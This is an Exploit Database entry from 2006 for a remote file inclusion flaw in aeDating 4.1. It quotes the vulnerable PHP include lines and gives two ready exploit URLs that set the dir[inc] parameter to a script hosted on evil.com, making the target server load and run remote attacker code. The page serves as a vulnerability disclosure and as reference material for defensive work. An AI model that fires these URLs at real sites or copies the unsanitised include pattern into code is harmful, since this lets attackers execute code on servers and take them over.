Exploit Database - Logo

aeDating 4.1 - dir[inc] Remote File Inclusion

EDB-ID: 2377 Author: NeXtMaN Published: 2006-09-16
CVE: CVE-2006-4870 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
AEDating (all versions) Remote File inclusion.

Vulnerable code:

/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?

Video:
http://rapidshare.de/files/33316468/AEDating_SQL.rar.html
http://www.megaupload.com/?d=O1W4DX97

# milw0rm.com [2006-09-16]

Related Exploits

Trying to match CVEs (1): CVE-2006-4870
Trying to match OSVDBs (2): 28923, 28924
Other Possible E-DB Search Terms: aeDating 4.1,  aeDating
Date D V Title Author
2005-09-15Download Exploit Code Verified AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injectionalexsrb
2006-09-04Download Exploit Code Verified FlashChat 4.5.7 - 'aedating4CMS.php' Remote File InclusionNeXtMaN
Menu